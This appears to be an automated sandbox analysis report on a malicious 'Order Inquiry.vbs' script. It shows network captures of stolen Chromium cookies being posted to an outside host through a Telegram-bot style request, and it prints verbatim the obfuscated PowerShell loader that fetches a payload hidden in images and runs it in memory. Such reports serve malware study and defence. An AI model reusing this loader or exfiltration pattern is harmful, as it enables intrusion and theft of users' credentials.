4c 4c 33 76 55 75 4b 45 62 46 34 77 6b 44 4b 6b 49 2f 39
          Data Ascii: dK50VeqWz7oQPhIQP3AnnhIRz7oQPhYQP3QnnhYTz7vH2nXg0uEY/XBB+uOB+8qKQcNGdcElIwB8OBxscq6HgnL3/DST/nIQezmnwfcJLaBREJK4JwmNeR08oZ3aw41n0HRH5CIhUC86Hv861QbgbcH15jvzyPPllFUd8WQe/1HJ9MTjXk89twCpw/2QMca52vdr93bnRI+cm2cOb4Xtz9/cEw+LhrpTxQt1otvkiUZsLL3vUuKEbF4wkDKkI/9
          2024-06-14 13:15:19 UTC1369INData Raw: 6e 68 4f 70 77 52 79 46 43 2b 49 6d 45 51 59 50 70 58 47 75 4e 54 36 54 6f 78 53 41 44 63 43 75 51 41 4c 39 59 41 34 4e 68 2b 37 4e 37 4d 34 65 44 67 2f 77 41 4b 55 42 79 67 41 38 42 70 43 75 77 6f 45 44 44 59 68 4d 4a 41 4e 6d 65 4b 59 73 51 44 6b 41 42 30 42 35 67 41 78 4e 44 45 54 41 41 78 55 41 4b 67 49 38 44 6c 41 4a 6f 4c 4a 57 42 69 4c 68 6d 53 6f 41 56 51 47 71 41 56 51 48 71 4b 47 4a 67 53 68 34 6f 43 5a 41 4c 59 44 61 41 4a 6b 41 57 56 6f 5a 69 49 5a 6e 73 67 48 71 41 4e 51 46 71 41 64 51 58 78 4d 44 4d 66 42 41 41 34 43 47 41 49 30 41 47 67 4d 30 30 63 70 41 4c 44 7a 54 46 4b 41 5a 51 48 4f 41 46 67 41 74 56 52 69 77 47 69 31 47 30 4c 6f 35 61 79 48 55 45 47 4e 79 59 6e 4a 65 61 55 67 50 38 65 44 4d 41 6a 6c 62 41 62 51 47 61 41 50 77 42 45 42
          Data Ascii: nhOpwRyFC+ImEQYPpXGuNT6ToxSADcCuQAL9YA4Nh+7N7M4eDg/wAKUBygA8BpCuwoEDDYhMJANmeKYsQDkAB0B5gAxNDETAAxUAKgI8DlAJoLJWBiLhmSoAVQGqAVQHqKGJgSh4oCZALYDaAJkAWVoZiIZnsgHqANQFqAdQXxMDMfBAA4CGAI0AGgM00cpALDzTFKAZQHOAFgAtVRiwGi1G0Lo5ayHUEGNyYnJeaUgP8eDMAjlbAbQGaAPwBEB
          2024-06-14 13:15:19 UTC1369INData Raw: 46 4b 49 38 4a 30 6f 47 48 7a 31 48 48 2f 30 67 33 4a 46 75 73 76 31 50 59 65 50 2f 6c 6a 6f 70 59 34 45 61 31 7a 6d 53 56 79 57 4f 4a 47 4a 67 53 34 6d 34 6c 43 61 76 48 35 44 6d 6d 63 4a 49 63 57 7a 68 4a 44 69 55 55 4a 49 38 43 77 4e 70 4d 68 30 42 30 6d 65 30 6f 51 55 73 73 6a 77 6e 53 67 79 5a 73 2f 73 55 65 62 61 55 4f 5a 59 64 35 6c 66 64 72 63 74 35 50 70 43 6a 39 32 44 2b 35 42 36 46 4e 73 58 75 68 6d 51 74 79 39 30 63 30 4b 31 4f 4b 49 41 42 30 6e 74 43 39 31 77 61 57 31 66 78 44 70 33 35 2b 6b 72 78 46 4b 53 63 70 33 54 56 42 47 6f 4b 69 59 79 50 4e 68 62 4e 30 6a 58 56 62 70 71 2b 74 45 76 69 6e 33 41 6c 44 65 37 74 53 4b 55 51 2b 6d 49 31 6f 42 63 52 37 51 57 78 52 4c 6d 53 69 71 68 39 4d 61 75 49 7a 68 6e 45 43 36 4e 79 59 52 70 69 7a 6b 54
          Data Ascii: FKI8J0oGHz1HH/0g3JFusv1PYeP/ljopY4Ea1zmSVyWOJGJgS4m4lCavH5DmmcJIcWzhJDiUUJI8CwNpMh0B0me0oQUssjwnSgyZs/sUebaUOZYd5lfdrct5PpCj92D+5B6FNsXuhmQty90c0K1OKIAB0ntC91waW1fxDp35+krxFKScp3TVBGoKiYyPNhbN0jXVbpq+tEvin3AlDe7tSKUQ+mI1oBcR7QWxRLmSiqh9MauIzhnEC6NyYRpizkT
          2024-06-14 13:15:19 UTC1369INData Raw: 37 33 54 66 49 51 70 31 5a 5a 78 77 5a 51 62 7a 30 44 32 63 5a 4d 42 4a 30 39 6a 58 58 32 4e 4b 66 55 46 6a 6a 43 61 78 44 2b 50 45 7a 76 55 46 73 48 45 65 31 75 30 2f 49 2f 36 4d 4f 64 32 75 6e 33 41 50 72 62 4d 66 33 74 4a 48 30 59 49 49 62 53 37 61 53 30 46 79 55 61 78 6c 42 70 45 34 6e 65 65 35 4a 76 49 74 48 62 54 4e 54 75 6c 4a 5a 4e 4c 75 31 37 55 61 49 75 46 71 7a 63 54 70 78 72 5a 39 4b 46 32 76 71 30 33 4d 36 2f 37 39 65 4c 59 56 33 45 56 70 63 61 39 35 2f 61 46 70 73 67 45 65 4b 35 64 30 32 64 39 64 50 6c 37 4c 44 6a 68 69 45 48 49 7a 32 57 62 76 68 35 44 36 4a 52 59 61 6c 58 76 46 77 57 79 6d 64 77 4e 4e 4f 62 4c 74 42 62 4b 4a 4e 74 56 4c 6c 4f 78 49 46 33 52 41 39 33 74 69 61 77 49 74 69 52 77 68 37 45 47 53 6c 75 6f 69 41 38 4f 4c 4a 6f 68
          Data Ascii: 73TfIQp1ZZxwZQbz0D2cZMBJ09jXX2NKfUFjjCaxD+PEzvUFsHEe1u0/I/6MOd2un3APrbMf3tJH0YIIbS7aS0FyUaxlBpE4nee5JvItHbTNTulJZNLu17UaIuFqzcTpxrZ9KF2vq03M6/79eLYV3EVpca95/aFpsgEeK5d02d9dPl7LDjhiEHIz2Wbvh5D6JRYalXvFwWymdwNNObLtBbKJNtVLlOxIF3RA93tiawItiRwh7EGSluoiA8OLJoh
          2024-06-14 13:15:19 UTC1369INData Raw: 30 44 77 59 68 67 5a 51 4f 66 43 63 59 68 71 2b 65 33 64 78 73 34 44 63 73 51 33 45 39 58 76 66 36 6c 56 70 66 49 36 36 50 66 62 37 39 4e 4c 46 5a 71 70 76 2b 59 76 51 52 51 77 35 47 61 6f 2f 54 6e 7a 4d 4d 32 34 44 32 4e 6b 78 37 47 36 65 30 4c 72 50 36 36 7a 59 7a 6c 48 57 6f 64 52 30 6c 6e 6c 70 44 76 78 33 61 69 6f 36 4e 6f 6e 39 76 57 71 53 58 63 62 74 42 56 33 5a 36 2b 64 54 59 49 4b 7a 63 77 39 5a 45 48 56 31 78 62 79 7a 68 37 71 42 64 74 75 41 51 5a 39 2b 50 5a 59 75 52 32 67 66 37 37 71 6b 71 64 75 49 39 4d 32 76 31 53 39 66 2f 48 6c 74 48 53 68 36 4c 50 71 67 66 53 52 44 53 53 61 39 32 6f 50 61 70 6d 6b 44 35 6a 2b 50 79 48 2b 63 55 39 6e 67 59 7a 32 49 4d 6f 4f 72 58 6c 45 73 4e 78 6a 44 72 58 2f 31 4d 67 6b 44 66 76 33 56 45 7a 74 34 64 35 4c
          Data Ascii: 0DwYhgZQOfCcYhq+e3dxs4DcsQ3E9Xvf6lVpfI66Pfb79NLFZqpv+YvQRQw5Gao/TnzMM24D2Nkx7G6e0LrP66zYzlHWodR0lnlpDvx3aio6Non9vWqSXcbtBV3Z6+dTYIKzcw9ZEHV1xbyzh7qBdtuAQZ9+PZYuR2gf77qkqduI9M2v1S9f/HltHSh6LPqgfSRDSSa92oPapmkD5j+PyH+cU9ngYz2IMoOrXlEsNxjDrX/1MgkDfv3VEzt4d5L
          2024-06-14 13:15:19 UTC1369INData Raw: 50 38 41 41 4f 72 73 72 52 37 63 53 6e 43 74 57 6e 4c 4d 4e 41 45 6d 73 4e 75 51 5a 43 44 41 49 59 44 42 41 4c 73 41 51 4e 57 4b 74 31 59 6c 6c 51 70 36 68 41 4d 4d 41 68 67 4f 4d 41 42 69 70 52 69 78 54 6e 56 67 57 35 42 6b 46 4d 42 70 67 44 49 41 54 59 4b 77 6d 4b 57 58 44 55 2b 4d 41 78 67 50 6b 41 55 77 41 6d 4b 6a 47 53 78 64 31 58 75 70 41 6e 6b 6b 41 6b 77 47 6d 41 45 77 46 6d 4b 5a 47 72 4b 55 36 73 62 71 51 4a 78 39 67 4f 6b 41 42 51 43 48 41 44 44 56 69 32 65 72 45 36 6b 47 65 49 6f 43 5a 41 4c 4d 41 5a 67 50 4d 55 53 4e 57 53 35 31 59 66 63 67 7a 46 32 41 65 77 48 79 41 42 51 42 50 71 68 47 72 71 30 36 73 41 65 52 35 43 75 42 70 67 49 55 41 69 77 41 57 71 78 48 72 70 45 36 73 49 65 52 35 42 6d 41 4a 77 46 4b 41 5a 51 44 4c 31 59 67 39 6f 55 36
          Data Ascii: P8AAOrsrR7cSnCtWnLMNAEmsNuQZCDAIYDBALsAQNWKt1YllQp6hAMMAhgOMABipRixTnVgW5BkFMBpgDIATYKwmKWXDU+MAxgPkAUwAmKjGSxd1XupAnkkAkwGmAEwFmKZGrKU6sbqQJx9gOkABQCHADDVi2erE6kGeIoCZALMAZgPMUSNWS51YfcgzF2AewHyABQBPqhGrq06sAeR5CuBpgIUAiwAWqxHrpE6sIeR5BmAJwFKAZQDL1Yg9oU6
          2024-06-14 13:15:19 UTC1369INData Raw: 67 45 4c 74 69 57 69 78 46 53 43 2b 44 71 61 67 54 54 30 53 41 72 78 79 49 70 67 36 70 46 55 49 42 31 44 76 4e 39 73 6f 4e 38 66 69 78 34 71 52 54 78 7a 56 61 47 73 34 55 41 6f 6b 6e 67 6f 55 61 45 67 55 65 67 68 38 63 52 6e 56 35 52 69 54 6b 49 70 4a 51 6b 57 66 36 4e 4a 6c 77 4c 4b 4a 51 6a 4b 45 78 56 59 54 49 43 48 6f 74 46 44 63 47 37 66 56 49 69 4d 77 5a 69 65 44 56 48 66 79 78 62 43 70 59 77 50 54 49 75 46 73 71 63 58 77 59 39 45 31 68 6a 49 61 69 62 6f 6f 77 77 55 2f 51 68 34 79 45 6f 38 6c 4b 46 51 76 48 68 34 4b 46 35 6b 77 6b 51 78 73 55 52 69 77 75 54 4a 52 41 6e 49 47 6b 58 51 62 78 68 4b 30 34 2b 47 68 2b 4a 45 2b 69 45 55 2f 57 63 6b 2b 69 47 65 39 4b 30 6f 4b 33 51 2f 6c 58 46 4f 41 35 56 7a 6b 5a 54 54 34 4a 45 7a 47 64 34 5a 53 7a 42 6d
          Data Ascii: gELtiWixFSC+DqagTT0SArxyIpg6pFUIB1DvN9soN8fix4qRTxzVaGs4UAokngoUaEgUegh8cRnV5RiTkIpJQkWf6NJlwLKJQjKExVYTICHotFDcG7fVIiMwZieDVHfyxbCpYwPTIuFsqcXwY9E1hjIaiboowwU/Qh4yEo8lKFQvHh4KF5kwkQxsURiwuTJRAnIGkXQbxhK04+Gh+JE+iEU/Wck+iGe9K0oK3Q/lXFOA5VzkZTT4JEzGd4ZSzBm
          2024-06-14 13:15:19 UTC1369INData Raw: 46 2f 6d 58 7a 68 31 47 4c 49 69 33 35 48 31 31 75 46 4e 35 58 65 77 62 39 56 35 68 51 52 57 6b 42 2f 66 44 43 52 37 73 45 62 5a 59 6d 42 4f 76 39 4d 68 59 75 31 47 65 68 32 43 35 44 76 58 6b 75 4b 76 78 33 54 31 39 63 67 2b 4d 76 38 2b 4c 76 68 44 50 77 4e 6f 76 79 74 53 6d 31 2f 67 62 79 73 75 2f 50 75 35 5a 33 30 30 31 57 33 44 5a 48 2f 4c 36 36 4d 49 77 62 66 66 4a 64 76 77 6a 4d 59 2b 42 66 6a 4c 77 62 41 70 79 32 58 34 76 46 79 61 47 76 79 37 75 67 32 74 64 70 55 5a 65 41 78 57 38 36 6a 48 2f 48 47 32 38 6e 72 47 44 6b 66 71 4a 37 61 73 53 47 4c 72 74 37 6b 6c 4f 2b 42 45 48 32 51 44 33 2f 65 78 67 2b 66 37 50 4b 55 48 33 72 6c 2f 7a 6f 51 64 77 69 79 79 43 47 42 34 6e 46 43 79 4f 54 52 37 44 79 32 6f 2b 72 42 2b 30 31 4f 45 63 4c 6b 71 7a 79 63 33
          Data Ascii: F/mXzh1GLIi35H11uFN5Xewb9V5hQRWkB/fDCR7sEbZYmBOv9MhYu1Geh2C5DvXkuKvx3T19cg+Mv8+LvhDPwNovytSm1/gbysu/Pu5Z3001W3DZH/L66MIwbffJdvwjMY+BfjLwbApy2X4vFyaGvy7ug2tdpUZeAxW86jH/HG28nrGDkfqJ7asSGLrt7klO+BEH2QD3/exg+f7PKUH3rl/zoQdwiyyCGB4nFCyOTR7Dy2o+rB+01OEcLkqzyc3


          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          5192.168.2.854306188.114.96.34438168C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
          TimestampBytes transferredDirectionData
          2024-06-14 13:15:27 UTC202OUTPOST /API/FETCH/getcountry.php HTTP/1.1
          Content-Type: multipart/form-data; boundary=---TelegramBotAPI_638539932481665828
          Host: whatismyipaddressnow.co
          Content-Length: 3035
          Connection: Keep-Alive
          2024-06-14 13:15:27 UTC1024OUTData Raw: 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 35 33 39 39 33 32 34 38 31 36 36 35 38 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 63 47 31 6a 54 30 56 78 52 46 51 78 56 32 46 79 63 6a 5a 4a 61 32 64 77 4b 31 6b 77 64 7a 30 39 0d 0a 2d 2d 2d 2d 2d 54 65 6c 65 67 72 61 6d 42 6f 74 41 50 49 5f 36 33 38 35 33 39 39 33 32 34 38 31 36 36 35 38 32 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 63 6a 6c 48 57 47 4e 4c 55 54 4e 79 4b 30 6c 58 4c 33 42 48 52 30 64 52 59 33 5a 6d 55 58 70 6d 55 48 42 50 64 7a 68 4e 4d 56 49
          Data Ascii: -----TelegramBotAPI_638539932481665828Content-Disposition: form-data; name="chat_id"cG1jT0VxRFQxV2FycjZJa2dwK1kwdz09-----TelegramBotAPI_638539932481665828Content-Disposition: form-data; name="token"cjlHWGNLUTNyK0lXL3BHR0dRY3ZmUXpmUHBPdzhNMVI
          2024-06-14 13:15:27 UTC2011OUTData Raw: 00 08 00 98 a2 ce 58 2c e1 37 db f5 00 00 00 5f 01 00 00 14 00 00 00 43 68 72 6f 6d 69 75 6d 2f 43 6f 6f 6b 69 65 73 2e 74 78 74 85 cf 4b 72 82 30 00 80 e1 75 9c f1 28 a1 09 31 3c 16 2e b0 01 24 20 52 1e a2 6e 3a 2d 42 50 52 52 69 05 a7 a7 ef 4c 0f 60 ff 03 7c 33 bf 26 94 12 b2 d6 2a f5 01 f2 b4 70 c1 13 f0 9c 28 73 01 26 64 41 28 b5 29 b1 30 c1 96 89 00 4e 5e b9 93 02 1d e9 04 62 04 11 85 c8 9a cf 96 8f 9a cf b4 07 3e 35 4c d3 32 ff 7c 5b c7 20 0e 18 a0 18 2f d5 50 65 41 af 8e ab 77 23 1b 26 94 9c 92 4d 5c 47 7e f8 55 8b 26 3a c3 ef 97 7e 3c b7 8a b6 21 df 87 2c 16 a8 db 07 49 df e4 d5 6d da d1 c1 4c af 97 dc b2 c9 67 e9 73 cf ec 64 78 95 a7 95 ba 2c 06 c6 c7 7b e3 49 c1 b6 cf 55 69 bf 85 ac 2f ec 9f 40 16 ad 1e 25 68 dc 5a 1d b9 e5 48 ac 39 c3 7c dc 39
          Data Ascii: X,7_Chromium/Cookies.txtKr0u(1<.$ Rn:-BPRRiL`|3&*p(s&dA()0N^b>5L2|[ /PeAw#&M\G~U&:~<!,ImLgsdx,{IUi/@%hZH9|9
          2024-06-14 13:15:28 UTC576INHTTP/1.1 200 OK
          Date: Fri, 14 Jun 2024 13:15:28 GMT
          Content-Type: application/json
          Content-Length: 20
          Connection: close
          CF-Cache-Status: DYNAMIC
          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Kc49QY8jI%2BMdPlzyygUBjBQTKt31piijLJD5awadGKwsfx83T%2FRJysDs10fe1oK7PqAmOXWIOtKXAXBXsyk8yZhp%2F66SZlDQleidldBcO5jBSOa%2FZOzh4r977pW1WGj%2BkBB9LY9xPASezg%3D%3D"}],"group":"cf-nel","max_age":604800}
          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
          Server: cloudflare
          CF-RAY: 893a96d9ab6e4775-DFW
          alt-svc: h3=":443"; ma=86400
          2024-06-14 13:15:28 UTC20INData Raw: 43 6f 75 6e 74 72 79 20 6e 6f 74 20 64 65 66 69 6e 65 64 2e
          Data Ascii: Country not defined.


          Click to jump to process

          Click to jump to process

          Click to dive into process behavior distribution

          Click to jump to process

          Target ID:0
          Start time:09:14:58
          Start date:14/06/2024
          Path:C:\Windows\System32\wscript.exe
          Wow64 process (32bit):false
          Commandline:C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\Order Inquiry.vbs"
          Imagebase:0x7ff7d1bb0000
          File size:170'496 bytes
          MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
          Has elevated privileges:false
          Has administrator privileges:false
          Programmed in:C, C++ or other language
          Reputation:high
          Has exited:true

          Target ID:3
          Start time:09:15:01
          Start date:14/06/2024
          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          Wow64 process (32bit):false
          Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTresDgTreCDgTreDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDkDgTreODgTreDgTrevDgTreDDgTreDgTreMQDgTrezDgTreC8DgTrebwByDgTreGkDgTreZwBpDgTreG4DgTreYQBsDgTreC8DgTrebgBlDgTreHcDgTreXwBpDgTreG0DgTreYQBnDgTreGUDgTreLgBqDgTreHDgTreDgTreZwDgTre/DgTreDEDgTreNwDgTrexDgTreDgDgTreMgDgTre4DgTreDQDgTreMQDgTrezDgTreDgDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTre7DgTreCDgTreDgTreaQBmDgTreCDgTreDgTreKDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTretDgTreG4DgTreZQDgTregDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTrepDgTreCDgTreDgTreewDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFQDgTreZQB4DgTreHQDgTreLgBFDgTreG4DgTreYwBvDgTreGQDgTreaQBuDgTreGcDgTreXQDgTre6DgTreDoDgTreVQBUDgTreEYDgTreODgTreDgTreuDgTreEcDgTreZQB0DgTreFMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCkDgTreOwDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBTDgTreFQDgTreQQBSDgTreFQDgTrePgDgTre+DgTreCcDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTregDgTreD0DgTreIDgTreDgTrenDgTreDwDgTrePDgTreBCDgTreEEDgTreUwBFDgTreDYDgTreNDgTreBfDgTreEUDgTreTgBEDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreEkDgTrebgBkDgTreGUDgTreeDgTreBPDgTreGYDgTreKDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBlDgTreG4DgTreZDgTreBGDgTreGwDgTreYQBnDgTreCkDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreGUDgTreIDgTreDgTrewDgTreCDgTreDgTreLQBhDgTreG4DgTreZDgTreDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQBnDgTreHQDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreC4DgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreOwDgTregDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreTDgTreBlDgTreG4DgTreZwB0DgTreGgDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBlDgTreG4DgTreZDgTreBJDgTreG4DgTreZDgTreBlDgTreHgDgTreIDgTreDgTretDgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreVDgTreBlDgTreHgDgTredDgTreDgTreuDgTreFMDgTredQBiDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCwDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCkDgTreOwDgTregDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreEMDgTrebwBuDgTreHYDgTreZQByDgTreHQDgTreXQDgTre6DgTreDoDgTreRgByDgTreG8DgTrebQBCDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreYgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreQwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQDgTregDgTreD0DgTreIDgTreBbDgTreFMDgTreeQBzDgTreHQDgTreZQBtDgTreC4DgTreUgBlDgTreGYDgTrebDgTreBlDgTreGMDgTredDgTreBpDgTreG8DgTrebgDgTreuDgTreEEDgTrecwBzDgTreGUDgTrebQBiDgTreGwDgTreeQBdDgTreDoDgTreOgBMDgTreG8DgTreYQBkDgTreCgDgTreJDgTreBjDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHQDgTreeQBwDgTreGUDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgT